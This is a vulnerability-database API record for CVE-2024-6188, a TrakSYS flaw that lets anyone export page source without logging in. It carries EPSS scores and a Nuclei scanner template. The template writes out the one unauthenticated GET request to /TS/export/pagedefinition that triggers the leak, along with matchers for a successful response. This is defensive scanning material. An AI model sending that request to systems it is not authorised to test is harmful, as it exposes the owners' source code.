{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-6188/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-6188/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-6188/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-6188/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-6188/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-6188"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-6188"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.02036,
      "kev": false,
      "percentile": 0.80233
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-6188.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2024-6188\n\ninfo:\n  name: TrakSYS 11.x.x - Sensitive Data Exposure\n  author: s4e-io\n  severity: medium\n  description: |\n    A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: An attacker is able to export the source code of the pages without having any credentials to access the application.\n  reference:\n    - https://kiwiyumi.com/post/tracksys-export-source-code/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-6188\n    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188\n    - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188\n  classification:\n    epss-score: 0.02036\n    epss-percentile: 0.80233\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: parsec-automation\n    product: tracksys\n  tags: cve,cve2024,traksys,idor,info-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /TS/export/pagedefinition?ID=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"TrakSYS Version\"\n          - \"Name\"\n          - \"Altname\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/plain\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a03c21f76a213ce9b5e8dd9a10faac21ba60a99fa2443093d6a62a7c9871d7f4022100847743ea499fcb0c832347436ad9e8731c576206e8dc46a688ad1c131e323343:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-6188"
}